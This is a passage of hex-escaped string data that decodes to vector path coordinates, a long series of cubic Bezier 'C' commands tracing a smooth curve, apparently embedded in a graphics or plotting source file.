\x43\x20\x37\x2e\x30\x39\x38\x31\x36\x35\x36\x33\x33\x31\x39\x20\
\x31\x35\x2e\x31\x39\x33\x36\x33\x39\x37\x34\x38\x38\x20\x37\x2e\
\x31\x30\x34\x34\x30\x36\x37\x30\x32\x30\x33\x20\x31\x35\x2e\x32\
\x30\x36\x37\x32\x38\x31\x31\x32\x39\x20\x37\x2e\x31\x31\x30\x36\
\x34\x37\x37\x37\x30\x38\x36\x20\x31\x35\x2e\x32\x31\x39\x30\x32\
\x38\x32\x37\x37\x33\x20\x43\x20\x37\x2e\x31\x31\x36\x38\x38\x38\
\x38\x33\x39\x37\x20\x31\x35\x2e\x32\x33\x31\x33\x32\x38\x34\x34\
\x31\x38\x20\x37\x2e\x31\x32\x33\x31\x32\x39\x39\x30\x38\x35\x34\
\x20\x31\x35\x2e\x32\x34\x32\x38\x33\x35\x36\x36\x34\x32\x20\x37\
\x2e\x31\x32\x39\x33\x37\x30\x39\x37\x37\x33\x37\x20\x31\x35\x2e\
\x32\x35\x33\x35\x34\x35\x38\x31\x39\x38\x20\x43\x20\x37\x2e\x31\
\x33\x35\x36\x31\x32\x30\x34\x36\x32\x31\x20\x31\x35\x2e\x32\x36\
\x34\x32\x35\x35\x39\x37\x35\x34\x20\x37\x2e\x31\x34\x31\x38\x35\
\x33\x31\x31\x35\x30\x34\x20\x31\x35\x2e\x32\x37\x34\x31\x36\x34\
\x32\x36\x38\x34\x20\x37\x2e\x31\x34\x38\x30\x39\x34\x31\x38\x33\
\x38\x38\x20\x31\x35\x2e\x32\x38\x33\x32\x36\x37\x38\x35\x39\x34\
\x20\x43\x20\x37\x2e\x31\x35\x34\x33\x33\x35\x32\x35\x32\x37\x32\
\x20\x31\x35\x2e\x32\x39\x32\x33\x37\x31\x34\x35\x30\x34\x20\x37\
\x2e\x31\x36\x30\x35\x37\x36\x33\x32\x31\x35\x35\x20\x31\x35\x2e\
\x33\x30\x30\x36\x36\x35\x34\x39\x37\x38\x20\x37\x2e\x31\x36\x36\
\x38\x31\x37\x33\x39\x30\x33\x39\x20\x31\x35\x2e\x33\x30\x38\x31\
\x34\x38\x34\x35\x32\x20\x43\x20\x37\x2e\x31\x37\x33\x30\x35\x38\
\x34\x35\x39\x32\x32\x20\x31\x35\x2e\x33\x31\x35\x36\x33\x31\x34\
\x30\x36\x33\x20\x37\x2e\x31\x37\x39\x32\x39\x39\x35\x32\x38\x30\
\x36\x20\x31\x35\x2e\x33\x32\x32\x32\x39\x38\x33\x38\x37\x33\x20\
\x37\x2e\x31\x38\x35\x35\x34\x30\x35\x39\x36\x39\x20\x31\x35\x2e\
\x33\x32\x38\x31\x34\x39\x31\x33\x37\x37\x20\x43\x20\x37\x2e\x31\
\x39\x31\x37\x38\x31\x36\x36\x35\x37\x33\x20\x31\x35\x2e\x33\x33\
\x33\x39\x39\x39\x38\x38\x38\x20\x37\x2e\x31\x39\x38\x30\x32\x32\
\x37\x33\x34\x35\x37\x20\x31\x35\x2e\x33\x33\x39\x30\x32\x39\x34\
\x39\x37\x20\x37\x2e\x32\x30\x34\x32\x36\x33\x38\x30\x33\x34\x20\
\x31\x35\x2e\x33\x34\x33\x32\x33\x38\x39\x39\x39\x35\x20\x43\x20\
\x37\x2e\x32\x31\x30\x35\x30\x34\x38\x37\x32\x32\x34\x20\x31\x35\
\x2e\x33\x34\x37\x34\x34\x38\x35\x30\x31\x39\x20\x37\x2e\x32\x31\
\x36\x37\x34\x35\x39\x34\x31\x30\x38\x20\x31\x35\x2e\x33\x35\x30\
\x38\x33\x32\x39\x36\x34\x20\x37\x2e\x32\x32\x32\x39\x38\x37\x30\
\x30\x39\x39\x31\x20\x31\x35\x2e\x33\x35\x33\x33\x39\x34\x37\x31\
\x31\x36\x20\x43\x20\x37\x2e\x32\x32\x39\x32\x32\x38\x30\x37\x38\
\x37\x35\x20\x31\x35\x2e\x33\x35\x35\x39\x35\x36\x34\x35\x39\x32\
\x20\x37\x2e\x32\x33\x35\x34\x36\x39\x31\x34\x37\x35\x38\x20\x31\
\x35\x2e\x33\x35\x37\x36\x39\x30\x35\x34\x32\x38\x20\x37\x2e\x32\
\x34\x31\x37\x31\x30\x32\x31\x36\x34\x32\x20\x31\x35\x2e\x33\x35\
\x38\x36\x30\x30\x35\x37\x35\x35\x20\x43\x20\x37\x2e\x32\x34\x37\
\x39\x35\x31\x32\x38\x35\x32\x36\x20\x31\x35\x2e\x33\x35\x39\x35\
\x31\x30\x36\x30\x38\x33\x20\x37\x2e\x32\x35\x34\x31\x39\x32\x33\
\x35\x34\x30\x39\x20\x31\x35\x2e\x33\x35\x39\x35\x39\x31\x36\x33\
\x32\x39\x20\x37\x2e\x32\x36\x30\x34\x33\x33\x34\x32\x32\x39\x33\
\x20\x31\x35\x2e\x33\x35\x38\x38\x34\x38\x35\x34\x34\x31\x20\x43\
\x20\x37\x2e\x32\x36\x36\x36\x37\x34\x34\x39\x31\x37\x36\x20\x31\
\x35\x2e\x33\x35\x38\x31\x30\x35\x34\x35\x35\x33\x20\x37\x2e\x32\
\x37\x32\x39\x31\x35\x35\x36\x30\x36\x20\x31\x35\x2e\x33\x35\x36\
\x35\x33\x33\x32\x39\x35\x36\x20\x37\x2e\x32\x37\x39\x31\x35\x36\
\x36\x32\x39\x34\x34\x20\x31\x35\x2e\x33\x35\x34\x31\x33\x38\x32\
\x33\x34\x20\x43\x20\x37\x2e\x32\x38\x35\x33\x39\x37\x36\x39\x38\
\x32\x37\x20\x31\x35\x2e\x33\x35\x31\x37\x34\x33\x31\x37\x32\x33\
\x20\x37\x2e\x32\x39\x31\x36\x33\x38\x37\x36\x37\x31\x31\x20\x31\
\x35\x2e\x33\x34\x38\x35\x32\x30\x32\x35\x38\x36\x20\x37\x2e\x32\
\x39\x37\x38\x37\x39\x38\x33\x35\x39\x34\x20\x31\x35\x2e\x33\x34\
\x34\x34\x37\x36\x39\x32\x36\x33\x20\x43\x20\x37\x2e\x33\x30\x34\
\x31\x32\x30\x39\x30\x34\x37\x38\x20\x31\x35\x2e\x33\x34\x30\x34\
\x33\x33\x35\x39\x34\x20\x37\x2e\x33\x31\x30\x33\x36\x31\x39\x37\
\x33\x36\x32\x20\x31\x35\x2e\x33\x33\x35\x35\x36\x34\x39\x30\x38\
\x32\x20\x37\x2e\x33\x31\x36\x36\x30\x33\x30\x34\x32\x34\x35\x20\
\x31\x35\x2e\x33\x32\x39\x38\x37\x39\x35\x35\x35\x34\x20\x43\x20\
\x37\x2e\x33\x32\x32\x38\x34\x34\x31\x31\x31\x32\x39\x20\x31\x35\
\x2e\x33\x32\x34\x31\x39\x34\x32\x30\x32\x37\x20\x37\x2e\x33\x32\
\x39\x30\x38\x35\x31\x38\x30\x31\x33\x20\x31\x35\x2e\x33\x31\x37\
\x36\x38\x37\x32\x37\x30\x37\x20\x37\x2e\x33\x33\x35\x33\x32\x36\
\x32\x34\x38\x39\x36\x20\x31\x35\x2e\x33\x31\x30\x33\x36\x38\x36\
\x38\x35\x38\x20\x43\x20\x37\x2e\x33\x34\x31\x35\x36\x37\x33\x31\
\x37\x38\x20\x31\x35\x2e\x33\x30\x33\x30\x35\x30\x31\x30\x31\x20\
\x37\x2e\x33\x34\x37\x38\x30\x38\x33\x38\x36\x36\x33\x20\x31\x35\
\x2e\x32\x39\x34\x39\x31\x34\x39\x38\x31\x32\x20\x37\x2e\x33\x35\
\x34\x30\x34\x39\x34\x35\x35\x34\x37\x20\x31\x35\x2e\x32\x38\x35\
\x39\x37\x34\x34\x37\x37\x32\x20\x43\x20\x37\x2e\x33\x36\x30\x32\
\x39\x30\x35\x32\x34\x33\x31\x20\x31\x35\x2e\x32\x37\x37\x30\x33\
\x33\x39\x37\x33\x32\x20\x37\x2e\x33\x36\x36\x35\x33\x31\x35\x39\
\x33\x31\x34\x20\x31\x35\x2e\x32\x36\x37\x32\x38\x33\x32\x34\x30\
\x38\x20\x37\x2e\x33\x37\x32\x37\x37\x32\x36\x36\x31\x39\x38\x20\
\x31\x35\x2e\x32\x35\x36\x37\x33\x34\x36\x33\x37\x38\x20\x43\x20\
\x37\x2e\x33\x37\x39\x30\x31\x33\x37\x33\x30\x38\x31\x20\x31\x35\
\x2e\x32\x34\x36\x31\x38\x36\x30\x33\x34\x38\x20\x37\x2e\x33\x38\
\x35\x32\x35\x34\x37\x39\x39\x36\x35\x20\x31\x35\x2e\x32\x33\x34\
\x38\x33\x34\x37\x36\x32\x33\x20\x37\x2e\x33\x39\x31\x34\x39\x35\
\x38\x36\x38\x34\x39\x20\x31\x35\x2e\x32\x32\x32\x36\x39\x34\x33\
\x36\x36\x33\x20\x43\x20\x37\x2e\x33\x39\x37\x37\x33\x36\x39\x33\
\x37\x33\x32\x20\x31\x35\x2e\x32\x31\x30\x35\x35\x33\x39\x37\x30\
\x32\x20\x37\x2e\x34\x30\x33\x39\x37\x38\x30\x30\x36\x31\x36\x20\
\x31\x35\x2e\x31\x39\x37\x36\x31\x39\x37\x30\x34\x34\x20\x37\x2e\
\x34\x31\x30\x32\x31\x39\x30\x37\x34\x39\x39\x20\x31\x35\x2e\x31\
\x38\x33\x39\x30\x36\x32\x38\x31\x37\x20\x43\x20\x37\x2e\x34\x31\
\x36\x34\x36\x30\x31\x34\x33\x38\x33\x20\x31\x35\x2e\x31\x37\x30\
\x31\x39\x32\x38\x35\x39\x31\x20\x37\x2e\x34\x32\x32\x37\x30\x31\
\x32\x31\x32\x36\x37\x20\x31\x35\x2e\x31\x35\x35\x36\x39\x35\x35\
\x39\x33\x35\x20\x37\x2e\x34\x32\x38\x39\x34\x32\x32\x38\x31\x35\
\x20\x31\x35\x2e\x31\x34\x30\x34\x33\x30\x33\x34\x32\x33\x20\x43\
\x20\x37\x2e\x34\x33\x35\x31\x38\x33\x33\x35\x30\x33\x34\x20\x31\
\x35\x2e\x31\x32\x35\x31\x36\x35\x30\x39\x31\x31\x20\x37\x2e\x34\
\x34\x31\x34\x32\x34\x34\x31\x39\x31\x37\x20\x31\x35\x2e\x31\x30\
\x39\x31\x32\x37\x32\x33\x35\x35\x20\x37\x2e\x34\x34\x37\x36\x36\
\x35\x34\x38\x38\x30\x31\x20\x31\x35\x2e\x30\x39\x32\x33\x33\x33\
\x37\x35\x32\x37\x20\x43\x20\x37\x2e\x34\x35\x33\x39\x30\x36\x35\
\x35\x36\x38\x35\x20\x31\x35\x2e\x30\x37\x35\x35\x34\x30\x32\x36\
\x39\x38\x20\x37\x2e\x34\x36\x30\x31\x34\x37\x36\x32\x35\x36\x38\
\x20\x31\x35\x2e\x30\x35\x37\x39\x38\x36\x36\x31\x35\x34\x20\x37\
\x2e\x34\x36\x36\x33\x38\x38\x36\x39\x34\x35\x32\x20\x31\x35\x2e\
\x30\x33\x39\x36\x39\x30\x38\x36\x20\x43\x20\x37\x2e\x34\x37\x32\
\x36\x32\x39\x37\x36\x33\x33\x35\x20\x31\x35\x2e\x30\x32\x31\x33\
\x39\x35\x31\x30\x34\x37\x20\x37\x2e\x34\x37\x38\x38\x37\x30\x38\
\x33\x32\x31\x39\x20\x31\x35\x2e\x30\x30\x32\x33\x35\x32\x37\x38\
\x35\x36\x20\x37\x2e\x34\x38\x35\x31\x31\x31\x39\x30\x31\x30\x33\
\x20\x31\x34\x2e\x39\x38\x32\x35\x38\x33\x30\x33\x39\x32\x20\x43\
\x20\x37\x2e\x34\x39\x31\x33\x35\x32\x39\x36\x39\x38\x36\x20\x31\
\x34\x2e\x39\x36\x32\x38\x31\x33\x32\x39\x32\x37\x20\x37\x2e\x34\
\x39\x37\x35\x39\x34\x30\x33\x38\x37\x20\x31\x34\x2e\x39\x34\x32\
\x33\x31\x31\x37\x34\x34\x34\x20\x37\x2e\x35\x30\x33\x38\x33\x35\
\x31\x30\x37\x35\x33\x20\x31\x34\x2e\x39\x32\x31\x30\x39\x38\x35\
\x36\x36\x37\x20\x43\x20\x37\x2e\x35\x31\x30\x30\x37\x36\x31\x37\
\x36\x33\x37\x20\x31\x34\x2e\x38\x39\x39\x38\x38\x35\x33\x38\x39\
\x20\x37\x2e\x35\x31\x36\x33\x31\x37\x32\x34\x35\x32\x31\x20\x31\
\x34\x2e\x38\x37\x37\x39\x35\x36\x33\x30\x32\x36\x20\x37\x2e\x35\
\x32\x32\x35\x35\x38\x33\x31\x34\x30\x34\x20\x31\x34\x2e\x38\x35\
\x35\x33\x33\x32\x34\x38\x34\x37\x20\x43\x20\x37\x2e\x35\x32\x38\
\x37\x39\x39\x33\x38\x32\x38\x38\x20\x31\x34\x2e\x38\x33\x32\x37\
\x30\x38\x36\x36\x36\x39\x20\x37\x2e\x35\x33\x35\x30\x34\x30\x34\
\x35\x31\x37\x31\x20\x31\x34\x2e\x38\x30\x39\x33\x38\x35\x39\x34\
\x20\x37\x2e\x35\x34\x31\x32\x38\x31\x35\x32\x30\x35\x35\x20\x31\
\x34\x2e\x37\x38\x35\x33\x38\x36\x34\x35\x33\x36\x20\x43\x20\x37\
\x2e\x35\x34\x37\x35\x32\x32\x35\x38\x39\x33\x39\x20\x31\x34\x2e\
\x37\x36\x31\x33\x38\x36\x39\x36\x37\x33\x20\x37\x2e\x35\x35\x33\
\x37\x36\x33\x36\x35\x38\x32\x32\x20\x31\x34\x2e\x37\x33\x36\x37\
\x30\x36\x36\x35\x32\x20\x37\x2e\x35\x36\x30\x30\x30\x34\x37\x32\
\x37\x30\x36\x20\x31\x34\x2e\x37\x31\x31\x33\x36\x38\x35\x39\x35\
\x33\x20\x43\x20\x37\x2e\x35\x36\x36\x32\x34\x35\x37\x39\x35\x38\
\x39\x20\x31\x34\x2e\x36\x38\x36\x30\x33\x30\x35\x33\x38\x36\x20\
\x37\x2e\x35\x37\x32\x34\x38\x36\x38\x36\x34\x37\x33\x20\x31\x34\
\x2e\x36\x36\x30\x30\x33\x30\x37\x38\x35\x36\x20\x37\x2e\x35\x37\
\x38\x37\x32\x37\x39\x33\x33\x35\x37\x20\x31\x34\x2e\x36\x33\x33\
\x33\x39\x33\x33\x32\x35\x38\x20\x43\x20\x37\x2e\x35\x38\x34\x39\
\x36\x39\x30\x30\x32\x34\x20\x31\x34\x2e\x36\x30\x36\x37\x35\x35\
\x38\x36\x36\x20\x37\x2e\x35\x39\x31\x32\x31\x30\x30\x37\x31\x32\
\x34\x20\x31\x34\x2e\x35\x37\x39\x34\x37\x36\x38\x36\x35\x32\x20\
\x37\x2e\x35\x39\x37\x34\x35\x31\x31\x34\x30\x30\x38\x20\x31\x34\
\x2e\x35\x35\x31\x35\x38\x31\x31\x37\x38\x33\x20\x43\x20\x37\x2e\
\x36\x30\x33\x36\x39\x32\x32\x30\x38\x39\x31\x20\x31\x34\x2e\x35\
\x32\x33\x36\x38\x35\x34\x39\x31\x33\x20\x37\x2e\x36\x30\x39\x39\
\x33\x33\x32\x37\x37\x37\x35\x20\x31\x34\x2e\x34\x39\x35\x31\x36\
\x39\x34\x31\x30\x35\x20\x37\x2e\x36\x31\x36\x31\x37\x34\x33\x34\
\x36\x35\x38\x20\x31\x34\x2e\x34\x36\x36\x30\x35\x38\x36\x31\x37\
\x32\x20\x43\x20\x37\x2e\x36\x32\x32\x34\x31\x35\x34\x31\x35\x34\
\x32\x20\x31\x34\x2e\x34\x33\x36\x39\x34\x37\x38\x32\x33\x39\x20\
\x37\x2e\x36\x32\x38\x36\x35\x36\x34\x38\x34\x32\x36\x20\x31\x34\
\x2e\x34\x30\x37\x32\x33\x38\x37\x34\x32\x38\x20\x37\x2e\x36\x33\
\x34\x38\x39\x37\x35\x35\x33\x30\x39\x20\x31\x34\x2e\x33\x37\x36\
\x39\x35\x37\x38\x34\x32\x33\x20\x43\x20\x37\x2e\x36\x34\x31\x31\
\x33\x38\x36\x32\x31\x39\x33\x20\x31\x34\x2e\x33\x34\x36\x36\x37\
\x36\x39\x34\x31\x39\x20\x37\x2e\x36\x34\x37\x33\x37\x39\x36\x39\
\x30\x37\x36\x20\x31\x34\x2e\x33\x31\x35\x38\x32\x30\x37\x38\x34\
\x34\x20\x37\x2e\x36\x35\x33\x36\x32\x30\x37\x35\x39\x36\x20\x31\
\x34\x2e\x32\x38\x34\x34\x31\x36\x35\x38\x34\x37\x20\x43\x20\x37\
\x2e\x36\x35\x39\x38\x36\x31\x38\x32\x38\x34\x34\x20\x31\x34\x2e\
\x32\x35\x33\x30\x31\x32\x33\x38\x35\x20\x37\x2e\x36\x36\x36\x31\
\x30\x32\x38\x39\x37\x32\x37\x20\x31\x34\x2e\x32\x32\x31\x30\x35\
\x36\x38\x34\x38\x34\x20\x37\x2e\x36\x37\x32\x33\x34\x33\x39\x36\
\x36\x31\x31\x20\x31\x34\x2e\x31\x38\x38\x35\x37\x37\x38\x39\x33\
\x36\x20\x43\x20\x37\x2e\x36\x37\x38\x35\x38\x35\x30\x33\x34\x39\
\x34\x20\x31\x34\x2e\x31\x35\x36\x30\x39\x38\x39\x33\x38\x38\x20\
\x37\x2e\x36\x38\x34\x38\x32\x36\x31\x30\x33\x37\x38\x20\x31\x34\
\x2e\x31\x32\x33\x30\x39\x33\x34\x31\x39\x36\x20\x37\x2e\x36\x39\
\x31\x30\x36\x37\x31\x37\x32\x36\x32\x20\x31\x34\x2e\x30\x38\x39\
\x35\x38\x39\x39\x31\x35\x34\x20\x43\x20\x37\x2e\x36\x39\x37\x33\
\x30\x38\x32\x34\x31\x34\x35\x20\x31\x34\x2e\x30\x35\x36\x30\x38\
\x36\x34\x31\x31\x32\x20\x37\x2e\x37\x30\x33\x35\x34\x39\x33\x31\
\x30\x32\x39\x20\x31\x34\x2e\x30\x32\x32\x30\x38\x31\x39\x32\x38\
\x38\x20\x37\x2e\x37\x30\x39\x37\x39\x30\x33\x37\x39\x31\x32\x20\
\x31\x33\x2e\x39\x38\x37\x36\x30\x35\x36\x36\x34\x36\x20\x43\x20\
\x37\x2e\x37\x31\x36\x30\x33\x31\x34\x34\x37\x39\x36\x20\x31\x33\
\x2e\x39\x35\x33\x31\x32\x39\x34\x30\x30\x34\x20\x37\x2e\x37\x32\
\x32\x32\x37\x32\x35\x31\x36\x38\x20\x31\x33\x2e\x39\x31\x38\x31\
\x37\x38\x35\x31\x38\x37\x20\x37\x2e\x37\x32\x38\x35\x31\x33\x35\
\x38\x35\x36\x33\x20\x31\x33\x2e\x38\x38\x32\x37\x38\x32\x37\x38\
\x37\x34\x20\x43\x20\x37\x2e\x37\x33\x34\x37\x35\x34\x36\x35\x34\
\x34\x37\x20\x31\x33\x2e\x38\x34\x37\x33\x38\x37\x30\x35\x36\x32\
\x20\x37\x2e\x37\x34\x30\x39\x39\x35\x37\x32\x33\x33\x20\x31\x33\
\x2e\x38\x31\x31\x35\x34\x33\x38\x30\x31\x38\x20\x37\x2e\x37\x34\
\x37\x32\x33\x36\x37\x39\x32\x31\x34\x20\x31\x33\x2e\x37\x37\x35\
\x32\x38\x33\x33\x31\x37\x39\x20\x43\x20\x37\x2e\x37\x35\x33\x34\
\x37\x37\x38\x36\x30\x39\x38\x20\x31\x33\x2e\x37\x33\x39\x30\x32\
\x32\x38\x33\x33\x39\x20\x37\x2e\x37\x35\x39\x37\x31\x38\x39\x32\
\x39\x38\x31\x20\x31\x33\x2e\x37\x30\x32\x33\x34\x32\x36\x31\x33\
\x31\x20\x37\x2e\x37\x36\x35\x39\x35\x39\x39\x39\x38\x36\x35\x20\
\x31\x33\x2e\x36\x36\x35\x32\x37\x33\x34\x32\x37\x35\x20\x43\x20\
\x37\x2e\x37\x37\x32\x32\x30\x31\x30\x36\x37\x34\x38\x20\x31\x33\
\x2e\x36\x32\x38\x32\x30\x34\x32\x34\x31\x39\x20\x37\x2e\x37\x37\
\x38\x34\x34\x32\x31\x33\x36\x33\x32\x20\x31\x33\x2e\x35\x39\x30\
\x37\x34\x33\x37\x35\x34\x34\x20\x37\x2e\x37\x38\x34\x36\x38\x33\
\x32\x30\x35\x31\x36\x20\x31\x33\x2e\x35\x35\x32\x39\x32\x33\x31\
\x36\x38\x33\x20\x43\x20\x37\x2e\x37\x39\x30\x39\x32\x34\x32\x37\
\x33\x39\x39\x20\x31\x33\x2e\x35\x31\x35\x31\x30\x32\x35\x38\x32\
\x33\x20\x37\x2e\x37\x39\x37\x31\x36\x35\x33\x34\x32\x38\x33\x20\
\x31\x33\x2e\x34\x37\x36\x39\x31\x39\x37\x33\x34\x31\x20\x37\x2e\
\x38\x30\x33\x34\x30\x36\x34\x31\x31\x36\x36\x20\x31\x33\x2e\x34\
\x33\x38\x34\x30\x36\x32\x31\x30\x32\x20\x43\x20\x37\x2e\x38\x30\
\x39\x36\x34\x37\x34\x38\x30\x35\x20\x31\x33\x2e\x33\x39\x39\x38\
\x39\x32\x36\x38\x36\x33\x20\x37\x2e\x38\x31\x35\x38\x38\x38\x35\
\x34\x39\x33\x34\x20\x31\x33\x2e\x33\x36\x31\x30\x34\x36\x35\x30\
\x30\x32\x20\x37\x2e\x38\x32\x32\x31\x32\x39\x36\x31\x38\x31\x37\
\x20\x31\x33\x2e\x33\x32\x31\x38\x39\x39\x35\x37\x32\x32\x20\x43\
\x20\x37\x2e\x38\x32\x38\x33\x37\x30\x36\x38\x37\x30\x31\x20\x31\
\x33\x2e\x32\x38\x32\x37\x35\x32\x36\x34\x34\x32\x20\x37\x2e\x38\
\x33\x34\x36\x31\x31\x37\x35\x35\x38\x34\x20\x31\x33\x2e\x32\x34\
\x33\x33\x30\x33\x31\x36\x38\x31\x20\x37\x2e\x38\x34\x30\x38\x35\
\x32\x38\x32\x34\x36\x38\x20\x31\x33\x2e\x32\x30\x33\x35\x38\x33\
\x33\x34\x39\x20\x43\x20\x37\x2e\x38\x34\x37\x30\x39\x33\x38\x39\
\x33\x35\x32\x20\x31\x33\x2e\x31\x36\x33\x38\x36\x33\x35\x32\x39\
\x38\x20\x37\x2e\x38\x35\x33\x33\x33\x34\x39\x36\x32\x33\x35\x20\
\x31\x33\x2e\x31\x32\x33\x38\x37\x31\x37\x34\x34\x33\x20\x37\x2e\
\x38\x35\x39\x35\x37\x36\x30\x33\x31\x31\x39\x20\x31\x33\x2e\x30\
\x38\x33\x36\x34\x30\x34\x33\x32\x35\x20\x43\x20\x37\x2e\x38\x36\
\x35\x38\x31\x37\x31\x30\x30\x30\x32\x20\x31\x33\x2e\x30\x34\x33\
\x34\x30\x39\x31\x32\x30\x36\x20\x37\x2e\x38\x37\x32\x30\x35\x38\
\x31\x36\x38\x38\x36\x20\x31\x33\x2e\x30\x30\x32\x39\x33\x36\x38\
\x34\x34\x35\x20\x37\x2e\x38\x37\x38\x32\x39\x39\x32\x33\x37\x37\
\x20\x31\x32\x2e\x39\x36\x32\x32\x35\x36\x32\x32\x39\x31\x20\x43\
\x20\x37\x2e\x38\x38\x34\x35\x34\x30\x33\x30\x36\x35\x33\x20\x31\
\x32\x2e\x39\x32\x31\x35\x37\x35\x36\x31\x33\x37\x20\x37\x2e\x38\
\x39\x30\x37\x38\x31\x33\x37\x35\x33\x37\x20\x31\x32\x2e\x38\x38\
\x30\x36\x38\x35\x34\x30\x38\x37\x20\x37\x2e\x38\x39\x37\x30\x32\
\x32\x34\x34\x34\x32\x31\x20\x31\x32\x2e\x38\x33\x39\x36\x31\x38\
\x33\x37\x33\x33\x20\x43\x20\x37\x2e\x39\x30\x33\x32\x36\x33\x35\
\x31\x33\x30\x34\x20\x31\x32\x2e\x37\x39\x38\x35\x35\x31\x33\x33\
\x38\x20\x37\x2e\x39\x30\x39\x35\x30\x34\x35\x38\x31\x38\x38\x20\
\x31\x32\x2e\x37\x35\x37\x33\x30\x36\x34\x31\x31\x36\x20\x37\x2e\
\x39\x31\x35\x37\x34\x35\x36\x35\x30\x37\x31\x20\x31\x32\x2e\x37\
\x31\x35\x39\x31\x36\x34\x33\x37\x34\x20\x43\x20\x37\x2e\x39\x32\
\x31\x39\x38\x36\x37\x31\x39\x35\x35\x20\x31\x32\x2e\x36\x37\x34\
\x35\x32\x36\x34\x36\x33\x31\x20\x37\x2e\x39\x32\x38\x32\x32\x37\
\x37\x38\x38\x33\x39\x20\x31\x32\x2e\x36\x33\x32\x39\x39\x30\x35\
\x37\x31\x33\x20\x37\x2e\x39\x33\x34\x34\x36\x38\x38\x35\x37\x32\
\x32\x20\x31\x32\x2e\x35\x39\x31\x33\x34\x31\x36\x33\x38\x33\x20\
\x43\x20\x37\x2e\x39\x34\x30\x37\x30\x39\x39\x32\x36\x30\x36\x20\
\x31\x32\x2e\x35\x34\x39\x36\x39\x32\x37\x30\x35\x32\x20\x37\x2e\
\x39\x34\x36\x39\x35\x30\x39\x39\x34\x38\x39\x20\x31\x32\x2e\x35\
\x30\x37\x39\x33\x30\x30\x35\x33\x38\x20\x37\x2e\x39\x35\x33\x31\
\x39\x32\x30\x36\x33\x37\x33\x20\x31\x32\x2e\x34\x36\x36\x30\x38\
\x36\x35\x34\x32\x34\x20\x43\x20\x37\x2e\x39\x35\x39\x34\x33\x33\
\x31\x33\x32\x35\x37\x20\x31\x32\x2e\x34\x32\x34\x32\x34\x33\x30\
\x33\x31\x31\x20\x37\x2e\x39\x36\x35\x36\x37\x34\x32\x30\x31\x34\
\x20\x31\x32\x2e\x33\x38\x32\x33\x31\x38\x31\x37\x36\x33\x20\x37\
\x2e\x39\x37\x31\x39\x31\x35\x32\x37\x30\x32\x34\x20\x31\x32\x2e\
\x33\x34\x30\x33\x34\x34\x37\x36\x37\x39\x20\x43\x20\x37\x2e\x39\
\x37\x38\x31\x35\x36\x33\x33\x39\x30\x37\x20\x31\x32\x2e\x32\x39\
\x38\x33\x37\x31\x33\x35\x39\x34\x20\x37\x2e\x39\x38\x34\x33\x39\
\x37\x34\x30\x37\x39\x31\x20\x31\x32\x2e\x32\x35\x36\x33\x34\x39\
\x31\x30\x38\x32\x20\x37\x2e\x39\x39\x30\x36\x33\x38\x34\x37\x36\
\x37\x35\x20\x31\x32\x2e\x32\x31\x34\x33\x31\x30\x36\x38\x34\x38\
\x20\x43\x20\x37\x2e\x39\x39\x36\x38\x37\x39\x35\x34\x35\x35\x38\
\x20\x31\x32\x2e\x31\x37\x32\x32\x37\x32\x32\x36\x31\x33\x20\x38\
\x2e\x30\x30\x33\x31\x32\x30\x36\x31\x34\x34\x32\x20\x31\x32\x2e\
\x31\x33\x30\x32\x31\x37\x35\x37\x31\x32\x20\x38\x2e\x30\x30\x39\
\x33\x36\x31\x36\x38\x33\x32\x35\x20\x31\x32\x2e\x30\x38\x38\x31\
\x37\x39\x31\x31\x35\x32\x20\x43\x20\x38\x2e\x30\x31\x35\x36\x30\
\x32\x37\x35\x32\x30\x39\x20\x31\x32\x2e\x30\x34\x36\x31\x34\x30\
\x36\x35\x39\x33\x20\x38\x2e\x30\x32\x31\x38\x34\x33\x38\x32\x30\
\x39\x33\x20\x31\x32\x2e\x30\x30\x34\x31\x31\x38\x35\x33\x38\x31\
\x20\x38\x2e\x30\x32\x38\x30\x38\x34\x38\x38\x39\x37\x36\x20\x31\
\x31\x2e\x39\x36\x32\x31\x34\x35\x30\x33\x32\x31\x20\x43\x20\x38\
\x2e\x30\x33\x34\x33\x32\x35\x39\x35\x38\x36\x20\x31\x31\x2e\x39\
\x32\x30\x31\x37\x31\x35\x32\x36\x32\x20\x38\x2e\x30\x34\x30\x35\
\x36\x37\x30\x32\x37\x34\x33\x20\x31\x31\x2e\x38\x37\x38\x32\x34\
\x36\x39\x33\x31\x32\x20\x38\x2e\x30\x34\x36\x38\x30\x38\x30\x39\
\x36\x32\x37\x20\x31\x31\x2e\x38\x33\x36\x34\x30\x33\x32\x35\x37\
\x36\x20\x43\x20\x38\x2e\x30\x35\x33\x30\x34\x39\x31\x36\x35\x31\
\x31\x20\x31\x31\x2e\x37\x39\x34\x35\x35\x39\x35\x38\x33\x39\x20\
\x38\x2e\x30\x35\x39\x32\x39\x30\x32\x33\x33\x39\x34\x20\x31\x31\
\x2e\x37\x35\x32\x37\x39\x37\x33\x32\x31\x36\x20\x38\x2e\x30\x36\
\x35\x35\x33\x31\x33\x30\x32\x37\x38\x20\x31\x31\x2e\x37\x31\x31\
\x31\x34\x38\x31\x36\x31\x37\x20\x43\x20\x38\x2e\x30\x37\x31\x37\
\x37\x32\x33\x37\x31\x36\x31\x20\x31\x31\x2e\x36\x36\x39\x34\x39\
\x39\x30\x30\x31\x39\x20\x38\x2e\x30\x37\x38\x30\x31\x33\x34\x34\
\x30\x34\x35\x20\x31\x31\x2e\x36\x32\x37\x39\x36\x33\x36\x32\x37\
\x39\x20\x38\x2e\x30\x38\x34\x32\x35\x34\x35\x30\x39\x32\x39\x20\
\x31\x31\x2e\x35\x38\x36\x35\x37\x33\x33\x36\x32\x36\x20\x43\x20\
\x38\x2e\x30\x39\x30\x34\x39\x35\x35\x37\x38\x31\x32\x20\x31\x31\
\x2e\x35\x34\x35\x31\x38\x33\x30\x39\x37\x34\x20\x38\x2e\x30\x39\
\x36\x37\x33\x36\x36\x34\x36\x39\x36\x20\x31\x31\x2e\x35\x30\x33\
\x39\x33\x38\x38\x31\x36\x37\x20\x38\x2e\x31\x30\x32\x39\x37\x37\
\x37\x31\x35\x37\x39\x20\x31\x31\x2e\x34\x36\x32\x38\x37\x31\x34\
\x32\x36\x37\x20\x43\x20\x38\x2e\x31\x30\x39\x32\x31\x38\x37\x38\
\x34\x36\x33\x20\x31\x31\x2e\x34\x32\x31\x38\x30\x34\x30\x33\x36\
\x36\x20\x38\x2e\x31\x31\x35\x34\x35\x39\x38\x35\x33\x34\x37\x20\
\x31\x31\x2e\x33\x38\x30\x39\x31\x34\x36\x30\x34\x32\x20\x38\x2e\
\x31\x32\x31\x37\x30\x30\x39\x32\x32\x33\x20\x31\x31\x2e\x33\x34\
